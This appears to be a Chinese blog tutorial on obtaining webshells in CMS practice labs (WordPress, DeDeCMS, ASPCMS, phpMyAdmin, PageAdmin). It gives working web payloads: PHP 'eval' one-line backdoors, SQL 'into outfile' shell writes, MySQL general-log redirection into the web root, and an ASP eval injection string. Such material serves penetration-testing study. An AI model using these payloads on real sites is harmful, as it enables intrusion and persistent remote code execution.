CMS框架漏洞

一、WordPress

姿势一

1.下载vulhub靶场

bash 复制代码
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d

2.我们进入后台,网址拼接/wp-admin/

3.我们进入WP的模板写入一句话木马后门并访问其文件即可GetShell

4然后我们拼接以下路径/wp-content/themes/twentyfifteen/404.php,访问

姿势二

1.按照以下步骤上传一个包含木马的主题压缩包

2.安装成功后访问主题下的网站后门文件,拼接以下路径/wp-content/themes/qzdy-master/1.php

二、DeDeCMS

姿势一

1.我们下载安装号靶场之后打开网站并进入后台,然后按照以下步骤上传文件

2.上传成功之后,我们就可以进行webshell连接了

姿势二

1.找到模板管理的地方,我们找一个文件来加入一句话木马

2.然后将网页更新一下

3.然后访问一下,即可看到结果

姿势三

1.我们按以下步骤找到执行sql命令的地方,执行以下命令来运行

sql 复制代码
select @@basedir
select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/'

三、ASPCMS

姿势一

1.下载好靶机之后,打开并进入后台。后台路径为/admin aspcms/index.asp

2.抓包后更改修改 slideTextStatus 字段的值内容,要保证人家原有的%>能够闭合

sql 复制代码
%25><%25eval (request(chr(65)))%25><%25

四、PhPMyadmin

姿势一

1.下载后靶场之后打开靶场,找到执行sql语句的地方

2.依次找到以下的地方,将日志文件打开,将日志文件的存储位置改为网站根目录

3.然后在输入sql的地方输入以下内容,然后在访问日志文件即可,也可以依次输入以下内容

sql 复制代码
show global variables like'%general%';
set global general log='on';    //日志保存状态开启
set global general log_file ='L:/phpstudy_pro/Www/888.php'    //修改日志的保存位置
show global variables like:'%general%'
select'<?php eval($ POST[cmd]);?>';

姿势二

1.依次输入以下内容,将木马写入到一个文件中去

sql 复制代码
select @@datadir
select "<?php eval($ PosT[a]);?>" into outfile 'L:/phpstudy_pro/ww/89.php'

五、Pageadmin

姿势一

1.我们下载后靶机后打开后台,找到上传模板的地方 ,上传一个包含木马的模板压缩包

姿势二

1.找到上传文件的地方,上传一个压缩后的木马文件(当然官方的可以上传)

相关推荐
IAR Systems6 分钟前
在IAR Embedded Workbench for Arm中实现Infineon TRAVEO™ T2G安全调试
开发语言·arm开发·安全·嵌入式软件开发·iar
不懂机器人23 分钟前
linux网络编程-----TCP服务端并发模型(epoll)
linux·网络·tcp/ip·算法
原点安全34 分钟前
某供应链金融公司多场景敏感数据安全保护实践
安全
麦聪聊数据38 分钟前
能源行业数据库远程运维安全合规实践:Web化平台的落地经验
运维·数据库·sql·安全·数据服务
上海控安1 小时前
上海控安:汽车API安全-风险与防护策略解析
网络·安全·汽车
wuyang-ligerj2 小时前
BGP路由协议(一):基本概念
运维·网络·网络协议·智能路由器
陈天cjq2 小时前
WebSocket 技术详解:协议原理、握手到生产落地的一站式实践
网络·websocket·网络协议
btyzadt4 小时前
Xray与XPOC工具对比分析
网络·安全·web安全
卓码软件测评4 小时前
【第三方网站运行环境测试:服务器配置(如Nginx/Apache)的WEB安全测试重点】
运维·服务器·前端·网络协议·nginx·web安全·apache
蜗牛沐雨4 小时前
HTTP 范围请求:为什么你的下载可以“断点续传”?
网络·网络协议·http